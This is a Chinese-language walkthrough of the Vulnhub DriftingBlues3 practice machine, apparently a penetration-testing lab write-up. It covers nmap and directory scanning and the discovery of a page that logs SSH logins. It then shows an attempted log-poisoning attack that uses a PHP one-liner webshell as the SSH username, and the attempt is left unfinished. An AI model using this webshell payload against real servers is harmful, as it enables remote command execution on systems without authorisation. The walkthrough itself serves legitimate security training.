靶机渗透实战-Vulnhub-Driftingblues3

主机发现

1
nmap 222.24.6.0/24

回显如下,无关信息略:

1
2
3
4
5
6
7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 14:18 CST
Nmap scan report for 222.24.6.185
Host is up (0.000053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

确认IP为222.24.6.185,只有个22端口的SSH和80端口的HTTP。详细扫描端口:

1
nmap -sV -A -p- -T4 222.24.6.185

回显如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 14:25 CST
Nmap scan report for 222.24.6.185
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/eventadmins
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds

HTTP

爆目录:

1
gobuster dir -u http://222.24.6.185/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

回显如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://222.24.6.185/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/privacy              (Status: 301) [Size: 314] [--> http://222.24.6.185/privacy/]
/drupal               (Status: 301) [Size: 313] [--> http://222.24.6.185/drupal/]
/secret               (Status: 301) [Size: 313] [--> http://222.24.6.185/secret/]
/Makefile             (Status: 200) [Size: 11]
/wp-admin             (Status: 301) [Size: 315] [--> http://222.24.6.185/wp-admin/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://222.24.6.185/phpmyadmin/]
/server-status        (Status: 403) [Size: 277]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

没有找到有用的目录,尝试另一种方法:

1
dirsearch -u http://222.24.6.185/

回显如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/monoceros406/reports/http_222.24.6.185/__24-03-19_14-33-38.txt

Target: http://222.24.6.185/

[14:33:38] Starting: 
[14:33:40] 403 -  277B  - /.ht_wsr.txt
[14:33:40] 403 -  277B  - /.htaccess.orig
[14:33:40] 403 -  277B  - /.htaccess.save
[14:33:40] 403 -  277B  - /.htaccess.sample
[14:33:40] 403 -  277B  - /.htaccess_orig
[14:33:40] 403 -  277B  - /.htaccess_extra
[14:33:40] 403 -  277B  - /.htaccess_sc
[14:33:40] 403 -  277B  - /.htaccessOLD2
[14:33:40] 403 -  277B  - /.htaccess.bak1
[14:33:40] 403 -  277B  - /.htaccessBAK
[14:33:40] 403 -  277B  - /.htaccessOLD
[14:33:40] 403 -  277B  - /.htm
[14:33:40] 403 -  277B  - /.html
[14:33:40] 403 -  277B  - /.httr-oauth
[14:33:40] 403 -  277B  - /.htpasswd_test
[14:33:40] 403 -  277B  - /.htpasswds
[14:33:41] 403 -  277B  - /.php
[14:34:02] 301 -  313B  - /drupal  ->  http://222.24.6.185/drupal/
[14:34:12] 200 -   11B  - /Makefile
[14:34:13] 200 -   11B  - /MANIFEST.MF
[14:34:18] 301 -  317B  - /phpmyadmin  ->  http://222.24.6.185/phpmyadmin/
[14:34:19] 200 -   28B  - /phpmyadmin/
[14:34:21] 301 -  314B  - /privacy  ->  http://222.24.6.185/privacy/
[14:34:23] 200 -   37B  - /robots.txt
[14:34:24] 301 -  313B  - /secret  ->  http://222.24.6.185/secret/
[14:34:24] 200 -   25B  - /secret/
[14:34:24] 403 -  277B  - /server-status
[14:34:24] 403 -  277B  - /server-status/
[14:34:35] 301 -  315B  - /wp-admin  ->  http://222.24.6.185/wp-admin/
[14:34:35] 200 -  457B  - /wp-admin/

Task Completed

有个robots协议,得到路由eventadmins,访问得到网页littlequeenofspades.html,最后有个白色的Base64,解密为/adminsfixit.php。

SSH

adminsfixit.php打开发现是个SSH登录日志,尝试访问SSH:

1
ssh root@222.24.6.185

回显如下:

1
2
3
4
5
6
The authenticity of host '222.24.6.185 (222.24.6.185)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '222.24.6.185' (ED25519) to the list of known hosts.
root@222.24.6.185: Permission denied (publickey).

最后一句发现只能通过公钥登录,有可能存在公钥泄漏。

随便找个用户名登录:

1
ssh asdfasdf@222.24.6.185

发现asdfasdf被该.php文件记录下来,想到可以写入一句话木马,尝试将木马作为登录名:

1
ssh '<?php echo "9898"; system($_GET["a"]); ?>'@192.168.31.193

先搁置研究一段时间,SSH版本更新后不允许用户名中出现各种非法字符,暂时没找到解决方法。